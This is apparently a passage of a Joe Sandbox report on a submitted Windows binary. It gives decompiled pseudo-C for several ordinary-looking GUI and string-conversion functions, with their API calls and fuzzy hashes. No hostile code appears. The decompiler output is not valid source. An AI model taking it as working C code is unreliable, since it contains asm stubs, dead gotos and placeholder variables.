						_t65 = E0042BA2F(0, _t83, __edx, __edi, _t91, __eflags);
						 *((char*)(_t94 - 4)) = 2;
					} else {
						_t65 = E0042BBEC(0, _t83, __edx, __edi, _t91, _t97);
						 *((char*)(_t94 - 4)) = 1;
					}
					E004056C2(0, _t94 - 0x10, _t65);
					 *((char*)(_t94 - 4)) = 0;
					E004010B0( *(_t94 - 0x14) + 0xfffffff0, _t88);
					E0040A356(_t94 - 0x10, 0xffffffff);
					L5:
					_t93 =  *(_t94 - 0x10);
					_t60 = PathFindExtensionA(_t93);
					if(_t60 == 0 ||  *_t60 != 0x2e) {
						L9:
						E00401E30(_t94 - 0x10);
						E00405562( *((intOrPtr*)(_t94 + 8)), __eflags, _t94 - 0x10);
						_t80 =  &(( *(_t94 - 0x10))[0xfffffffffffffff0]);
					} else {
						_push( &(_t60[1]));
						E00406039(0,  *((intOrPtr*)(_t94 + 8)), _t88, _t89, _t93,  &(_t60[1]));
						_t80 = _t93 - 0x10;
					}
					E004010B0(_t80, _t88);
				}
				return E00431B73( *((intOrPtr*)(_t94 + 8)));
				goto L24;
			}















                  0x0042bcdf
                  0x0042bcdf
                  0x0042bcdf
                  0x0042bce6
                  0x0042bceb
                  0x0042bcef
                  0x0042bcf6
                  0x0042bd8d
                  0x0042bd90
                  0x0042bd97
                  0x0042bdf4
                  0x0042bdf4
                  0x0042bdfa
                  0x0042bdfc
                  0x0042be12
                  0x0042be16
                  0x0042be22
                  0x0042be24
                  0x00000000
                  0x0042be18
                  0x0042be18
                  0x0042be1b
                  0x0042be1b
                  0x0042bdfe
                  0x0042bdfe
                  0x0042be01
                  0x0042be05
                  0x0042be0e
                  0x0042be27
                  0x0042be2b
                  0x0042be2b
                  0x0042be2e
                  0x0042be07
                  0x0042be07
                  0x0042be07
                  0x0042be05
                  0x0042be2f
                  0x0042bd99
                  0x0042bd99
                  0x0042bd9c
                  0x00000000
                  0x0042bd9e
                  0x0042bda1
                  0x0042bda6
                  0x0042bdaf
                  0x0042bdbe
                  0x0042bdd9
                  0x0042bde6
                  0x0042bdeb
                  0x0042bded
                  0x00000000
                  0x0042bdef
                  0x00000000
                  0x0042bdef
                  0x00000000
                  0x0042bded
                  0x0042bd9c
                  0x0042bcfc
                  0x0042bcff
                  0x0042bd07
                  0x0042bd0a
                  0x0042bd0c
                  0x0042bd0d
                  0x0042bd10
                  0x0042bd1d
                  0x0042bd22
                  0x0042bd12
                  0x0042bd12
                  0x0042bd17
                  0x0042bd17
                  0x0042bd2a
                  0x0042bd35
                  0x0042bd38
                  0x0042bd42
                  0x0042bd47
                  0x0042bd47
                  0x0042bd4b
                  0x0042bd53
                  0x0042bd71
                  0x0042bd74
                  0x0042bd80
                  0x0042bd88
                  0x0042bd5a
                  0x0042bd5e
                  0x0042bd5f
                  0x0042bd64
                  0x0042bd64
                  0x0042bd67
                  0x0042bd67
                  0x0042be3c
                  0x00000000

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0042BCE6
                  • PathFindExtensionA.SHLWAPI(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000008,0042C1CC,?), ref: 0042BD4B
                  • GetParent.USER32(?), ref: 0042BDC1
                  • SendMessageA.USER32(?,00000464,00000104,?), ref: 0042BDD9
                    • Part of subcall function 0042BBEC: __EH_prolog3.LIBCMT ref: 0042BBF3
                    • Part of subcall function 0042BBEC: CoTaskMemFree.OLE32(?,?), ref: 0042BC37
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$ExtensionFindFreeMessageParentPathSendTask
                  • String ID:
                  • API String ID: 3379981378-0
                  • Opcode ID: e185d9022893ddd1bb200dc0489ac492a0c42998567e89b33223990446d52f3f
                  • Instruction ID: 085081a633f1afcd9b041cece9632050099a798345f581a82a4ab2aafd9681eb
                  • Opcode Fuzzy Hash: e185d9022893ddd1bb200dc0489ac492a0c42998567e89b33223990446d52f3f
                  • Instruction Fuzzy Hash: 85418E30A10265DBCB10EFA1D8919FE77B1FF00318F94462EE552672E1DB389944CB9A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004253B4, Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                  Download Yara Rule
                  C-Code - Quality: 80%
                  			E004253B4(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t60;
				signed int _t65;
				intOrPtr _t67;
				signed int _t73;
				void* _t76;
				void* _t80;
				void* _t84;
				intOrPtr _t85;

				_t76 = __ecx;
				_v24 = 1;
				_v20 = 1;
				_t85 = E00423045(__ecx, __ecx, _t80, _t84, __eflags, GetStockObject(0));
				_v16 = _t85;
				_v8 = E00423F2F(_t76, _t80, _t85, __eflags);
				_t60 =  *(_t76 + 0x74);
				_v12 = _t85;
				if((0x0000a000 & _t60) == 0) {
					__eflags = _t60 & 0x00005000;
					if(__eflags == 0) {
						_v24 = GetSystemMetrics(0x20) - 1;
						_v20 = GetSystemMetrics(0x21) - 1;
						_t65 =  *(_t76 + 0x78);
						__eflags = 0x0000a000 & _t65;
						if((0x0000a000 & _t65) == 0) {
							L6:
							__eflags = _t65 & 0x00005000;
							if(__eflags == 0) {
								L9:
							} else {
								__eflags =  *(_t76 + 0x7c);
								if(__eflags == 0) {
									goto L9;
								} else {
									goto L8;
								}
							}
						} else {
							__eflags =  *(_t76 + 0x7c);
							if(__eflags != 0) {
								goto L6;
							}
						}
						_v12 = _v8;
					} else {
					}
				} else {
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_a4 != 0) {
					_v20 = 0;
					_v24 = 0;
				}
				if(( *(_t76 + 0x74) & 0x0000f000) != 0) {
					InflateRect( &_v40, 0xffffffff, 0xffffffff);
				}
				_t67 = _v8;
				_t97 =  *(_t76 + 0x24);
				if( *(_t76 + 0x24) == 0) {
					_t67 = _v16;
				}
				E0042408E(_t76,  *((intOrPtr*)(_t76 + 0x84)), _t76 + 0xc, 0, _t97,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
				asm("movsd");
				_t73 = 0 | _v12 == _v8;
				asm("movsd");
				 *(_t76 + 0x24) = _t73;
				return _t73;
			}





















                  0x004253c4
                  0x004253c6
                  0x004253c9
                  0x004253d8
                  0x004253da
                  0x004253e2
                  0x004253e5
                  0x004253e8
                  0x004253f2
                  0x004253f9
                  0x004253fe
                  0x00425412
                  0x00425418
                  0x0042541b
                  0x0042541e
                  0x00425420
                  0x00425428
                  0x00425428
                  0x0042542d
                  0x0042543a
                  0x0042542f
                  0x0042542f
                  0x00425433
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00425433
                  0x00425422
                  0x00425422
                  0x00425426
                  0x00000000
                  0x00000000
                  0x00425426
                  0x00425440
                  0x00425400
                  0x00425400
                  0x004253f4
                  0x004253f4
                  0x00425446
                  0x00425447
                  0x00425448
                  0x00425449
                  0x0042544f
                  0x00425451
                  0x00425454
                  0x00425454
                  0x0042545e
                  0x00425468
                  0x00425468
                  0x0042546e
                  0x00425471
                  0x00425474
                  0x00425476
                  0x00425476
                  0x00425497
                  0x004254a5
                  0x004254a6
                  0x004254ac
                  0x004254ad
                  0x004254b5
                  0x004254b6
                  0x004254b9
                  0x004254bc
                  0x004254c1

                  APIs
                  • GetStockObject.GDI32(00000000), ref: 004253CC
                    • Part of subcall function 00423F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 00423F77
                    • Part of subcall function 00423F2F: CreatePatternBrush.GDI32(00000000), ref: 00423F84
                    • Part of subcall function 00423F2F: DeleteObject.GDI32(00000000), ref: 00423F90
                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00425468
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CreateObject$BitmapBrushDeleteInflatePatternRectStock
                  • String ID:
                  • API String ID: 3923860780-0
                  • Opcode ID: 0bdc1af02f3c5e9820d79e2338334d270b3c5ac4aabd9b9409ecc159be85d491
                  • Instruction ID: d9756c9e36c98306afc5a098c904508bb618c2e312976f6a3c34b45bf204dd42
                  • Opcode Fuzzy Hash: 0bdc1af02f3c5e9820d79e2338334d270b3c5ac4aabd9b9409ecc159be85d491
                  • Instruction Fuzzy Hash: 43415B71E00629DBCF10DFA4D984BAEB7B5EB08315F610166ED10AB255C3789E81CF94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004425DA, Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004425DA(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E00430D81( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E004403C3( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00431D3E(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                  0x004425e4
                  0x004425eb
                  0x00442602
                  0x00000000
                  0x004425f2
                  0x004425f4
                  0x0044260e
                  0x00442613
                  0x00442616
                  0x00442619
                  0x00442642
                  0x00442649
                  0x0044264b
                  0x004426cc
                  0x004426e7
                  0x004426e9
                  0x00442629
                  0x00442629
                  0x0044262c
                  0x0044262e
                  0x00442631
                  0x00442631
                  0x00442631
                  0x00442631
                  0x00000000
                  0x00442637
                  0x004426ab
                  0x004426ab
                  0x004426b0
                  0x004426b6
                  0x004426b9
                  0x004426bb
                  0x004426be
                  0x004426be
                  0x004426be
                  0x004426be
                  0x00000000
                  0x004426c2
                  0x0044264d
                  0x00442650
                  0x00442656
                  0x00442659
                  0x00442680
                  0x00442683
                  0x00442689
                  0x00000000
                  0x00000000
                  0x0044268b
                  0x0044268e
                  0x00000000
                  0x00000000
                  0x00442690
                  0x00442690
                  0x00442696
                  0x00442699
                  0x00442607
                  0x00442607
                  0x004426a2
                  0x00000000
                  0x004426a2
                  0x0044265b
                  0x0044265e
                  0x00000000
                  0x00000000
                  0x00442662
                  0x00442673
                  0x00442679
                  0x0044267b
                  0x0044267e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0044267e
                  0x0044261b
                  0x0044261e
                  0x00442620
                  0x00442626
                  0x00442626
                  0x00000000
                  0x004425f6
                  0x004425f6
                  0x004425fb
                  0x004425ff
                  0x004425ff
                  0x00000000
                  0x004425fb
                  0x004425f4

                  APIs
                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0044260E
                  • __isleadbyte_l.LIBCMT ref: 00442642
                  • MultiByteToWideChar.KERNEL32(00000080,00000009,004307FC,?,00000000,00000000,?,?,?,?,004307FC,00000000,?), ref: 00442673
                  • MultiByteToWideChar.KERNEL32(00000080,00000009,004307FC,00000001,00000000,00000000,?,?,?,?,004307FC,00000000,?), ref: 004426E1
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                  • String ID:
                  • API String ID: 3058430110-0
                  • Opcode ID: 4f51aa9334f70c85223a4e687f06baf9a762fd662b4e9dda525f56099a8685db
                  • Instruction ID: 7a3e3710ad6dcf06bb425cbd2a2258c827f30c13012a9450a5fd42bd5fc93319
                  • Opcode Fuzzy Hash: 4f51aa9334f70c85223a4e687f06baf9a762fd662b4e9dda525f56099a8685db
                  • Instruction Fuzzy Hash: 5231F331A00246EFEB21DF64C990AAE7BA4FF01310F56856AF4518B291D7B4DD41DB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040A8A9, Relevance: 6.1, APIs: 4, Instructions: 103COMMON
                  Download Yara Rule
                  C-Code - Quality: 97%
                  			E0040A8A9(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t34;
				struct HWND__* _t37;
				signed int _t38;
				void* _t65;
				short* _t67;
				struct HWND__** _t69;
				void* _t70;
				struct HWND__** _t74;
				intOrPtr _t76;

				_t66 = __edi;
				_t65 = __edx;
				_push(0x10c);
				E00431B04(E0044AD6E, __ebx, __edi, __esi);
				_t69 =  *(_t70 + 0xc);
				_t34 =  *((intOrPtr*)(_t70 + 0x10));
				_t74 = _t69;
				_t56 = 0 | _t74 != 0x00000000;
				 *((intOrPtr*)(_t70 - 0x118)) = _t34;
				_t75 = _t74 != 0;
				if(_t74 != 0) {
					L2:
					_t76 = _t34;
					_t56 = 0 | _t76 != 0x00000000;
					if(_t76 != 0) {
						goto L1;
					}
					E004014C0(_t70 - 0x114, _t65);
					_t59 = _t69[2];
					_t37 = _t69[1];
					_t67 = 0xfffffdf8;
					 *((intOrPtr*)(_t70 - 4)) = 0;
					if(_t59 != 0xfffffdf8 || (_t69[0x19] & 0x00000001) == 0) {
						if(_t59 != 0xfffffdee || (_t69[0x2d] & 0x00000001) == 0) {
							goto L8;
						} else {
							goto L7;
						}
					} else {
						L7:
						_t37 = GetDlgCtrlID(_t37);
						L8:
						if(_t37 == 0) {
							L12:
							__eflags = _t69[2] - _t67;
							if(_t69[2] != _t67) {
								_t67 =  &(_t69[4]);
								_t38 = MultiByteToWideChar(3, 0,  *(_t70 - 0x114), 0xffffffff, _t67, 0x50);
								__eflags = _t67;
								if(_t67 != 0) {
									__eflags = _t38 - 0x50;
									if(_t38 > 0x50) {
										_t38 = E00401090(_t59, _t65, 0x80004005);
									}
								}
								__eflags = _t38;
								if(_t38 > 0) {
									__eflags = _t67;
									if(_t67 != 0) {
										__eflags = 0;
										 *((short*)(_t67 + _t38 * 2 - 2)) = 0;
									}
								}
							} else {
								E0040842D(0, _t65, _t67, _t69,  &(_t69[4]), 0x50,  *(_t70 - 0x114), 0xffffffff);
							}
							 *((intOrPtr*)( *((intOrPtr*)(_t70 - 0x118)))) = 0;
							SetWindowPos( *_t69, 0, 0, 0, 0, 0, 0x213);
							E004010B0( &(( *(_t70 - 0x114))[0xfffffffffffffff0]), _t65);
							__eflags = 1;
							L21:
							return E00431B87(0, _t67, _t69);
						}
						_t59 = _t70 - 0x110;
						if(E0041B239(0, _t70 - 0x110, _t67, _t69, _t37, _t70 - 0x110, 0x100) != 0) {
							E0041B29E(_t70 - 0x114, _t70 - 0x110, 1, 0xa);
							goto L12;
						} else {
							E004010B0( &(( *(_t70 - 0x114))[0xfffffffffffffff0]), _t65);
							goto L21;
						}
					}
				}
				L1:
				_t34 = E00406436(0, _t56, _t66, _t69, _t75);
				goto L2;
			}












                  0x0040a8a9
                  0x0040a8a9
                  0x0040a8a9
                  0x0040a8b3
                  0x0040a8b8
                  0x0040a8bb
                  0x0040a8c2
                  0x0040a8c4
                  0x0040a8c7
                  0x0040a8cd
                  0x0040a8cf
                  0x0040a8d6
                  0x0040a8d8
                  0x0040a8da
                  0x0040a8e1
                  0x00000000
                  0x00000000
                  0x0040a8e9
                  0x0040a8ee
                  0x0040a8f1
                  0x0040a8f4
                  0x0040a8f9
                  0x0040a8fe
                  0x0040a90c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040a917
                  0x0040a917
                  0x0040a918
                  0x0040a91e
                  0x0040a920
                  0x0040a964
                  0x0040a964
                  0x0040a967
                  0x0040a983
                  0x0040a992
                  0x0040a998
                  0x0040a99a
                  0x0040a99c
                  0x0040a99f
                  0x0040a9a6
                  0x0040a9a6
                  0x0040a99f
                  0x0040a9ab
                  0x0040a9ad
                  0x0040a9af
                  0x0040a9b1
                  0x0040a9b3
                  0x0040a9b5
                  0x0040a9b5
                  0x0040a9b1
                  0x0040a969
                  0x0040a977
                  0x0040a97c
                  0x0040a9ca
                  0x0040a9ce
                  0x0040a9dd
                  0x0040a9e4
                  0x0040a9e5
                  0x0040a9ea
                  0x0040a9ea
                  0x0040a927
                  0x0040a936
                  0x0040a95f
                  0x00000000
                  0x0040a938
                  0x0040a941
                  0x00000000
                  0x0040a946
                  0x0040a936
                  0x0040a8fe
                  0x0040a8d1
                  0x0040a8d1
                  0x00000000

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0040A8B3
                  • GetDlgCtrlID.USER32 ref: 0040A918
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,00000050,0000010C,00404692,?,?,?), ref: 0040A992
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 0040A9CE
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ByteCharCtrlException@8H_prolog3H_prolog3_MultiThrowWideWindow
                  • String ID:
                  • API String ID: 1933732581-0
                  • Opcode ID: 3165a1b386513dabdfb5d7ee7af79dfe6ece074409af96b752cbb1d83e808885
                  • Instruction ID: 4d93c7147c348ebad3ea942ba8eea6060f3f1e63af0d97cf858e573eee83d13f
                  • Opcode Fuzzy Hash: 3165a1b386513dabdfb5d7ee7af79dfe6ece074409af96b752cbb1d83e808885
                  • Instruction Fuzzy Hash: AB31E371A003199BCF24DB748D86BEE7264AF04714F110A7EF656F22D1DA789D90CA1B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042D72D, Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E0042D72D(void* __ebx, void* __ecx, signed int __edi, void* __esi, void* __eflags) {
				INT* _t48;
				signed int _t52;
				signed int _t62;
				CHAR* _t83;
				signed int _t86;
				void* _t87;

				_t82 = __edi;
				_push(0x18);
				E00431A9B(E0044C8E7, __ebx, __edi, __esi);
				_t85 = __ecx;
				 *(_t87 - 0x10) = 0;
				 *(_t87 - 4) = 0;
				 *(_t87 - 0x14) = 0;
				_t48 =  *(_t87 + 0x20);
				 *(_t87 - 4) = 1;
				 *(_t87 - 0x18) = 0;
				if(_t48 != 0) {
					L7:
					_t82 = ExtTextOutA( *(_t85 + 4),  *(_t87 + 8),  *(_t87 + 0xc),  *(_t87 + 0x10),  *(_t87 + 0x14),  *(_t87 + 0x18),  *(_t87 + 0x1c), _t48);
					__eflags =  *(_t87 - 0x18);
					if(__eflags != 0) {
						__eflags = _t82;
						if(__eflags != 0) {
							__eflags = GetTextAlign( *(_t85 + 8)) & 0x00000001;
							if(__eflags != 0) {
								GetCurrentPositionEx( *(_t85 + 4), _t87 - 0x24);
								_t58 =  *(_t87 - 0x24) -  *(_t87 - 0x18);
								__eflags =  *(_t87 - 0x24) -  *(_t87 - 0x18);
								E00422BBC(_t85, _t87 - 0x1c, _t58,  *((intOrPtr*)(_t87 - 0x20)));
							}
						}
					}
					_t86 = _t82;
					L13:
					 *(_t87 - 4) = 0;
					E00404490(0, _t82, _t86, __eflags,  *(_t87 - 0x14));
					 *(_t87 - 4) =  *(_t87 - 4) | 0xffffffff;
					E00404490(0, _t82, _t86, __eflags,  *(_t87 - 0x10));
					_t52 = _t86;
					L3:
					return E00431B73(_t52);
				}
				_t90 =  *(_t87 + 0x1c);
				if( *(_t87 + 0x1c) != 0) {
					_push( *(_t87 + 0x1c));
					__eflags = E0042CF42(0, _t87 - 0x10, __edi, __ecx, __eflags);
					if(__eflags == 0) {
						L12:
						_t86 = 0;
						__eflags = 0;
						goto L13;
					}
					_push( *(_t87 + 0x1c));
					_t62 = E0042CF01(0, _t87 - 0x14, _t82, __ecx, __eflags);
					__eflags = _t62;
					if(_t62 == 0) {
						goto L12;
					}
					_t83 =  *(_t87 - 0x14);
					E0042D2AB(__ecx, _t87 - 0x24, _t87 + 8,  *(_t87 + 0x18), _t87 + 0x1c, 0, 0, 0, 0, _t83,  *(_t87 - 0x10), _t87 - 0x18);
					_t48 =  *(_t87 - 0x10);
					 *(_t87 + 0x18) = _t83;
					goto L7;
				} else {
					 *(_t87 - 4) = 0;
					E00404490(0, __edi, __ecx, _t90, 0);
					 *(_t87 - 4) =  *(_t87 - 4) | 0xffffffff;
					E00404490(0, _t82, _t85, _t90, 0);
					_t52 = 1;
					goto L3;
				}
			}









                  0x0042d72d
                  0x0042d72d
                  0x0042d734
                  0x0042d739
                  0x0042d73d
                  0x0042d740
                  0x0042d743
                  0x0042d746
                  0x0042d749
                  0x0042d74d
                  0x0042d752
                  0x0042d7ca
                  0x0042d7e6
                  0x0042d7e8
                  0x0042d7eb
                  0x0042d7ed
                  0x0042d7ef
                  0x0042d7fa
                  0x0042d7fc
                  0x0042d805
                  0x0042d811
                  0x0042d811
                  0x0042d81b
                  0x0042d81b
                  0x0042d7fc
                  0x0042d7ef
                  0x0042d820
                  0x0042d826
                  0x0042d829
                  0x0042d82c
                  0x0042d834
                  0x0042d838
                  0x0042d83f
                  0x0042d771
                  0x0042d776
                  0x0042d776
                  0x0042d754
                  0x0042d757
                  0x0042d779
                  0x0042d784
                  0x0042d786
                  0x0042d824
                  0x0042d824
                  0x0042d824
                  0x00000000
                  0x0042d824
                  0x0042d78c
                  0x0042d792
                  0x0042d797
                  0x0042d799
                  0x00000000
                  0x00000000
                  0x0042d79f
                  0x0042d7bf
                  0x0042d7c4
                  0x0042d7c7
                  0x00000000
                  0x0042d759
                  0x0042d75a
                  0x0042d75d
                  0x0042d762
                  0x0042d767
                  0x0042d770
                  0x00000000
                  0x0042d770

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0042D734
                  • ExtTextOutA.GDI32(?,?,?,?,?,?,?,?), ref: 0042D7E0
                  • GetTextAlign.GDI32(?), ref: 0042D7F4
                  • GetCurrentPositionEx.GDI32(?,?), ref: 0042D805
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Text$AlignCurrentH_prolog3Position
                  • String ID:
                  • API String ID: 2049318899-0
                  • Opcode ID: f6f8fc8d486f84dd401bb7ca46793f57f13d9363a740a3804ca8543d50e5fc4c
                  • Instruction ID: a3f77aa90376770f17176c528fcb1e9fde7301855a461e76d5891e40defe5d24
                  • Opcode Fuzzy Hash: f6f8fc8d486f84dd401bb7ca46793f57f13d9363a740a3804ca8543d50e5fc4c
                  • Instruction Fuzzy Hash: FB315C7190015EAFCF11EFA5D8858EFBBB9FF08314B10402AF525A2260CA399E11DBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042495D, Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E0042495D(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t39;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;
				void* _t51;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				void* _t68;
				void* _t70;

				_t65 = __edi;
				_t64 = __edx;
				_t51 = E0041F396(_t50, __ecx, __edi, _t68, __eflags);
				_t29 =  *((intOrPtr*)(_t51 + 0x10));
				if(_t29 == 0) {
					L19:
					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
				}
				_t32 = _t29 - 1;
				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
				if(_t32 != 0) {
					goto L19;
				}
				if(_a4 == 0) {
					L8:
					_push(_t65);
					_t66 =  *((intOrPtr*)(E0041F363(_t51, _t65, 0, _t77) + 4));
					_t70 = E004205AE(0x466508);
					if(_t70 == 0 || _t66 == 0) {
						L18:
						goto L19;
					} else {
						_t35 =  *((intOrPtr*)(_t70 + 0xc));
						_t80 = _t35;
						if(_t35 == 0) {
							L12:
							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
								_t36 =  *((intOrPtr*)(_t70 + 0xc));
								_a4 = _a4 & 0x00000000;
								_t83 = _t36;
								if(_t36 != 0) {
									_push(_t36);
									_t39 = E004344B4(_t51, _t64, _t66, _t70, _t83);
									_push( *((intOrPtr*)(_t70 + 0xc)));
									_a4 = _t39;
									E004316F6(_t51, _t66, _t70, _t83);
								}
								_t37 = E0043108C(_t51, _t64, _t66,  *((intOrPtr*)(_t66 + 0x98)));
								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
								if(_t37 == 0 && _a4 != _t37) {
									 *((intOrPtr*)(_t70 + 0xc)) = E0043108C(_t51, _t64, _t66, _a4);
								}
							}
							goto L18;
						}
						_push(_t35);
						if(E004344B4(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
							goto L18;
						}
						goto L12;
					}
				}
				if(_a4 != 0xffffffff) {
					_t47 = E00415AD9();
